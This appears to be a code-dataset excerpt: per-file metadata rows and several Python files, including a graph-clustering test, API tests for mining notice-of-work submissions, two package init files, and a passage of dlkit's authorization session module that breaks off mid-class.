| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7ba983a2c839be1dfa3a88ffa4c32747f568686e
| 2,123
|
py
|
Python
|
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_inflate.py
|
FilipKlaesson/cops
|
67d2e5dd4534b3f3eec95b6cfda9d4c9c1746ef0
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from cops.graph import Graph
from cops.clustering import ClusterProblem, ClusterStructure, inflate_agent_clusters
def test_activationinflate1():
G = Graph()
G.add_connectivity_path([0, 1])
G.add_connectivity_path([0, 2])
agent_positions = {0: 0, 1: 1, 2: 2}
G.init_agents(agent_positions)
cs = ClusterStructure(agent_clusters={"c0": [0], "c1": [1], "c2": [2]})
master = 0
cp = ClusterProblem()
cp.graph = G
cp.master = master
cp.prepare_problem(remove_dead=False)
cs = inflate_agent_clusters(cp, cs)
np.testing.assert_equal(cs.subgraphs["c0"], set([0]))
np.testing.assert_equal(cs.subgraphs["c1"], set([1]))
np.testing.assert_equal(cs.subgraphs["c2"], set([2]))
np.testing.assert_equal(cs.child_clusters["c0"], {("c1", 1), ("c2", 2)})
np.testing.assert_equal(cs.child_clusters["c1"], set())
np.testing.assert_equal(cs.child_clusters["c2"], set())
np.testing.assert_equal(cs.parent_clusters["c1"], ("c0", 0))
np.testing.assert_equal(cs.parent_clusters["c2"], ("c0", 0))
def test_inflate2():
G = Graph()
G.add_transition_path(list(range(0, 12)))
G.add_connectivity_path(list(range(0, 12)))
G.add_connectivity_path([6, 8])
agent_positions = {0: 0, 1: 1, 2: 4, 3: 6, 4: 8, 5: 10}
G.init_agents(agent_positions)
cs = ClusterStructure(agent_clusters={"c0": [0, 1], "c1": [2, 3], "c2": [4, 5]})
master = 0
cp = ClusterProblem()
cp.graph = G
cp.master = master
cp.prepare_problem(remove_dead=False)
cs = inflate_agent_clusters(cp, cs)
np.testing.assert_equal(cs.subgraphs["c0"], set([0, 1, 2, 3]))
np.testing.assert_equal(cs.subgraphs["c1"], set([4, 5, 6, 7]))
np.testing.assert_equal(cs.subgraphs["c2"], set([8, 9, 10, 11]))
np.testing.assert_equal(cs.child_clusters["c0"], {("c1", 4)})
np.testing.assert_equal(cs.child_clusters["c1"], {("c2", 8)})
np.testing.assert_equal(cs.child_clusters["c2"], set())
np.testing.assert_equal(cs.parent_clusters["c1"], ("c0", 3))
np.testing.assert_equal(cs.parent_clusters["c2"], ("c1", 6))
| 31.686567
| 84
| 0.646726
| 323
| 2,123
| 4.077399
| 0.179567
| 0.109339
| 0.182232
| 0.242976
| 0.823083
| 0.791192
| 0.786636
| 0.757783
| 0.53303
| 0.422172
| 0
| 0.055681
| 0.162506
| 2,123
| 66
| 85
| 32.166667
| 0.685039
| 0
| 0
| 0.391304
| 0
| 0
| 0.028262
| 0
| 0
| 0
| 0
| 0
| 0.347826
| 1
| 0.043478
| false
| 0
| 0.065217
| 0
| 0.108696
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c896cf21816f76cd01ad1bacb6b82f675af14297
| 12,510
|
py
|
Python
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 25
|
2018-07-09T19:04:37.000Z
|
2022-03-15T17:27:10.000Z
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 983
|
2018-04-25T20:08:07.000Z
|
2022-03-31T21:45:20.000Z
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 58
|
2018-05-15T22:35:50.000Z
|
2021-11-29T19:40:52.000Z
|
import json
from tests.factories import (NOWSubmissionFactory, MineFactory, NOWClientFactory,
NOWApplicationIdentityFactory)
class TestGetApplicationResource:
"""GET /now-submissions/applications/{application_guid}"""
def test_get_now_submission_by_guid_success(self, test_client, db_session, auth_headers):
"""Should return the correct records with a 200 response code"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['now_application_guid'] is not None
assert get_data['now_application_guid'] == str(identity.now_application_guid)
def test_get_now_submission_by_guid_mine_name(self, test_client, db_session, auth_headers):
"""Should include the correct mine name"""
mine = MineFactory()
now_submission = NOWSubmissionFactory(mine=mine)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['mine_name'] is not None
assert get_data['mine_name'] == mine.mine_name
def test_get_now_submission_by_guid_applicant(self, test_client, db_session, auth_headers):
"""Should include the correct applicant"""
applicant = NOWClientFactory()
now_submission = NOWSubmissionFactory(applicant=applicant)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['applicant']['type'] is not None
assert get_data['applicant']['type'] == applicant.type
def test_get_now_submission_by_guid_submitter(self, test_client, db_session, auth_headers):
"""Should include the correct submitter"""
submitter = NOWClientFactory()
now_submission = NOWSubmissionFactory(submitter=submitter)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['submitter']['type'] is not None
assert get_data['submitter']['type'] == submitter.type
def test_get_now_submission_by_guid_documents(self, test_client, db_session, auth_headers):
"""Should include the correct documents"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['documents'][0]['filename'] is not None
assert get_data['documents'][0]['filename'] in list(
map(lambda x: x.filename, now_submission.documents))
def test_get_now_submission_by_guid_contacts(self, test_client, db_session, auth_headers):
"""Should include the correct contacts"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['contacts'][0]['type'] is not None
assert get_data['contacts'][0]['type'] in list(
map(lambda x: x.type, now_submission.contacts))
def test_get_now_submission_by_guid_existing_placer_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct existing_placer_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['existing_placer_activity'][0]['type'] is not None
assert get_data['existing_placer_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.existing_placer_activity))
def test_get_now_submission_by_guid_proposed_placer_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct proposed_placer_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['proposed_placer_activity'][0]['type'] is not None
assert get_data['proposed_placer_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.proposed_placer_activity))
def test_get_now_submission_by_guid_existing_settling_pond(self, test_client, db_session,
auth_headers):
"""Should include the correct existing_settling_pond"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['existing_settling_pond'][0]['pondid'] is not None
assert get_data['existing_settling_pond'][0]['pondid'] in list(
map(lambda x: x.pondid, now_submission.existing_settling_pond))
def test_get_now_submission_by_guid_proposed_settling_pond(self, test_client, db_session,
auth_headers):
"""Should include the correct proposed_settling_pond"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['proposed_settling_pond'][0]['pondid'] is not None
assert get_data['proposed_settling_pond'][0]['pondid'] in list(
map(lambda x: x.pondid, now_submission.proposed_settling_pond))
def test_get_now_submission_by_guid_sand_grv_qry_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct sand_grv_qry_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['sand_grv_qry_activity'][0]['type'] is not None
assert get_data['sand_grv_qry_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.sand_grv_qry_activity))
def test_get_now_submission_by_guid_under_exp_new_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_new_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_new_activity'][0]['type'] is not None
assert get_data['under_exp_new_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_new_activity))
def test_get_now_submission_by_guid_under_exp_rehab_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_rehab_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_rehab_activity'][0]['type'] is not None
assert get_data['under_exp_rehab_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_rehab_activity))
def test_get_now_submission_by_guid_under_exp_surface_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_surface_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_surface_activity'][0]['type'] is not None
assert get_data['under_exp_surface_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_surface_activity))
def test_get_now_submission_by_guid_water_source_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct water_source_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['water_source_activity'][0]['type'] is not None
assert get_data['water_source_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.water_source_activity))
| 55.110132
| 97
| 0.681455
| 1,463
| 12,510
| 5.470267
| 0.057416
| 0.115332
| 0.048732
| 0.051981
| 0.907035
| 0.899538
| 0.878171
| 0.864426
| 0.828814
| 0.781832
| 0
| 0.007223
| 0.22534
| 12,510
| 226
| 98
| 55.353982
| 0.818595
| 0.060192
| 0
| 0.627119
| 0
| 0
| 0.155447
| 0.113652
| 0
| 0
| 0
| 0
| 0.254237
| 1
| 0.084746
| false
| 0
| 0.011299
| 0
| 0.101695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c8b4dfd0fac657e7ac7e488ed975872bacfb263c
| 25
|
py
|
Python
|
manager/__init__.py
|
monocleface/viewer
|
8ab47a9e846bd2716fe0208c34f33565513fc3f6
|
[
"Apache-2.0"
] | 6
|
2020-02-28T21:18:16.000Z
|
2020-03-13T16:45:57.000Z
|
manager/__init__.py
|
monocleface/viewer
|
8ab47a9e846bd2716fe0208c34f33565513fc3f6
|
[
"Apache-2.0"
] | 6
|
2020-02-28T12:42:52.000Z
|
2020-03-16T03:49:09.000Z
|
manager/__init__.py
|
monocleface/viewer
|
8ab47a9e846bd2716fe0208c34f33565513fc3f6
|
[
"Apache-2.0"
] | 6
|
2020-03-05T13:04:25.000Z
|
2020-03-13T16:46:03.000Z
|
from .utils import Config
| 25
| 25
| 0.84
| 4
| 25
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c8ec940438930475725da4b1624b8e42cb723947
| 157
|
py
|
Python
|
core/models/__init__.py
|
Brain-Engine/ImageNet
|
893a8008e0e8e373bc66a7cbb40813db8495426a
|
[
"Apache-2.0"
] | 1
|
2021-05-17T11:49:12.000Z
|
2021-05-17T11:49:12.000Z
|
core/models/__init__.py
|
Brain-Engine/ImageNet
|
893a8008e0e8e373bc66a7cbb40813db8495426a
|
[
"Apache-2.0"
] | null | null | null |
core/models/__init__.py
|
Brain-Engine/ImageNet
|
893a8008e0e8e373bc66a7cbb40813db8495426a
|
[
"Apache-2.0"
] | 1
|
2021-05-17T11:49:22.000Z
|
2021-05-17T11:49:22.000Z
|
# import models from torchvision
from torchvision.models import *
# import models from efficientnet
from .efficientnet import b0, b1, b2, b3, b4, b5, b6, b7
| 31.4
| 56
| 0.764331
| 23
| 157
| 5.217391
| 0.565217
| 0.2
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 0.159236
| 157
| 4
| 57
| 39.25
| 0.848485
| 0.394904
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cdfbbb1e16902c1d3761509ecf7d21633da2152a
| 161,322
|
py
|
Python
|
dlkit/json_/authorization/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/authorization/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/authorization/sessions.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON implementations of authorization sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from bson.objectid import ObjectId
from . import objects
from . import queries
from .. import utilities
from ..id.objects import IdList
from ..osid import sessions as osid_sessions
from ..osid.sessions import OsidSession
from ..primitives import DateTime
from ..primitives import Id
from ..primitives import Type
from ..utilities import JSONClientValidated
from ..utilities import PHANTOM_ROOT_IDENTIFIER
from ..utilities import overlap
from dlkit.abstract_osid.authorization import sessions as abc_authorization_sessions
from dlkit.abstract_osid.authorization.objects import AuthorizationForm as ABCAuthorizationForm
from dlkit.abstract_osid.authorization.objects import VaultForm as ABCVaultForm
from dlkit.abstract_osid.id.primitives import Id as ABCId
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.type.primitives import Type as ABCType
DESCENDING = -1
ASCENDING = 1
CREATED = True
UPDATED = True
ENCLOSURE_RECORD_TYPE = Type(
identifier='enclosure',
namespace='osid-object',
authority='ODL.MIT.EDU')
COMPARATIVE = 0
PLENARY = 1
class AuthorizationSession(abc_authorization_sessions.AuthorizationSession, osid_sessions.OsidSession):
"""This is the basic session for verifying authorizations."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
# def _get_qualifier_idstrs(self, qualifier_id):
# def generate_qualifier_ids():
# try:
# authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
# identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
# except:
# return [str(qualifier_id)]
# root_qualifier_id = Id(
# authority=qualifier_id.get_authority(),
# namespace=qualifier_id.get_identifier_namespace(),
# identifier='ROOT')
# if qualifier_id.get_identifier() == 'ROOT':
# return [str(root_qualifier_id)]
# hierarchy_mgr = self._get_provider_manager('HIERARCHY') # local=True ???
# hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
# Id(authority=authority,
# namespace='CATALOG',
# identifier=identifier),
# proxy=self._proxy)
# node = hierarchy_session.get_nodes(qualifier_id, 10, 0, False)
# return self._get_ancestor_idstrs(node) + [str(root_qualifier_id)]
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@mongo')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'hierarchy-qualifier-ids-{0}'.format(str(qualifier_id))
#
# if mc.get(key) is None:
# qualifier_ids = generate_qualifier_ids()
# mc.set(key, qualifier_ids, time=30 * 60)
# else:
# qualifier_ids = mc.get(key)
# else:
# qualifier_ids = generate_qualifier_ids()
# return qualifier_ids
#
# def _get_ancestor_idstrs(self, node):
# def get_ancestors(internal_node):
# node_list = [str(internal_node.get_id())]
# if internal_node.has_parents():
# for parent_node in internal_node.get_parents():
# node_list += self._get_ancestor_idstrs(parent_node)
# return list(set(node_list))
#
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@json')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'ancestor-ids-{0}'.format(str(node.ident))
#
# if mc.get(key) is None:
# ancestor_ids = get_ancestors(node)
# mc.set(key, ancestor_ids, time=30 * 60)
# else:
# ancestor_ids = mc.get(key)
# else:
# ancestor_ids = get_ancestors(node)
# return ancestor_ids
def _get_hierarchy_session(self, hierarchy_id):
"""Returns a hierarchy traversal session for the hierarchy"""
hierarchy_mgr = self._get_provider_manager('HIERARCHY', local=True)
return hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
hierarchy_id,
proxy=self._proxy)
def _caching_enabled(self):
"""Returns True if caching is enabled per configuration, false otherwise."""
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:useCachingForQualifierIds@json')
if config.get_value_by_parameter(parameter_id).get_boolean_value():
return True
else:
return False
except (AttributeError, KeyError, errors.NotFound):
return False
def _get_parent_id_list(self, qualifier_id, hierarchy_id):
"""Returns list of parent id strings for qualifier_id in hierarchy.
Uses memcache if caching is enabled.
"""
if self._caching_enabled():
key = 'parent_id_list_{0}'.format(str(qualifier_id))
# If configured to use memcache as the caching engine, use it.
# Otherwise default to diskcache
caching_engine = 'diskcache'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingEngine@json')
caching_engine = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
if caching_engine == 'memcache':
import memcache
caching_host = '127.0.0.1:11211'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingHostURI@json')
caching_host = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
mc = memcache.Client([caching_host], debug=0)
parent_id_list = mc.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
mc.set(key, parent_id_list)
elif caching_engine == 'diskcache':
import diskcache
with diskcache.Cache('/tmp/dlkit_cache') as cache:
# A little bit non-DRY, since it's almost the same as for memcache above.
# However, for diskcache.Cache, we have to call ".close()" or use a
# ``with`` statement to safeguard calling ".close()", so we keep this
# separate from the memcache implementation.
parent_id_list = cache.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
cache.set(key, parent_id_list)
else:
raise errors.NotFound('The {0} caching engine was not found.'.format(caching_engine))
else:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
return parent_id_list
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_access_authorizations(self):
"""Tests if this user can perform authorization checks.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if authorization methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return True
@utilities.arguments_not_none
def is_authorized(self, agent_id, function_id, qualifier_id):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hieratchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-nornmalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
return: (boolean) - ``true`` if the user is authorized,
``false`` othersise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id`` or
``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifer``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
def is_parent_authorized(catalog_id):
"""Recursively checks parents for implicit authorizations"""
parent_id_list = self._get_parent_id_list(catalog_id, hierarchy_id)
if parent_id_list:
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': parent_id_list}})
except errors.NotFound:
for parent_id in parent_id_list:
if is_parent_authorized(Id(parent_id)):
return True
return False
else:
return True
else:
return False
# Check first for an explicit or 'ROOT' level implicit authorization:
try:
authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
except KeyError:
idstr_list = [str(qualifier_id)]
authority = identifier = None
else:
# handle aliased IDs
package_name = qualifier_id.get_identifier_namespace().split('.')[0]
qualifier_id = self._get_id(qualifier_id, package_name)
root_qualifier_id = Id(
authority=qualifier_id.get_authority(),
namespace=qualifier_id.get_identifier_namespace(),
identifier='ROOT')
idstr_list = [str(root_qualifier_id), str(qualifier_id)]
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': idstr_list}})
# Otherwise check for implicit authorization through inheritance:
except errors.NotFound:
if authority and identifier:
hierarchy_id = Id(authority=authority,
namespace='CATALOG',
identifier=identifier)
return is_parent_authorized(qualifier_id)
else:
return False
else:
return True
@utilities.arguments_not_none
def get_authorization_condition(self, function_id):
"""Gets the ``AuthorizationCondition`` for making conditional authorization checks.
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
return: (osid.authorization.AuthorizationCondition) - an
authorization condition
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def is_authorized_on_condition(self, agent_id, function_id, qualifier_id, condition):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hieratchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-nornmalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
arg: condition (osid.authorization.AuthorizationCondition):
an authorization condition
return: (boolean) - ``true`` if the user is authorized,
``false`` othersise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id,
qualifier_id`` , or ``condition`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
raise: Unsupported - ``condition`` is not of this service
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifer``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
raise errors.Unimplemented()
class AuthorizationLookupSession(abc_authorization_sessions.AuthorizationLookupSession, osid_sessions.OsidSession):
"""This session defines methods to search and retrieve ``Authorization`` mappings."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
self._catalog_class = objects.Vault
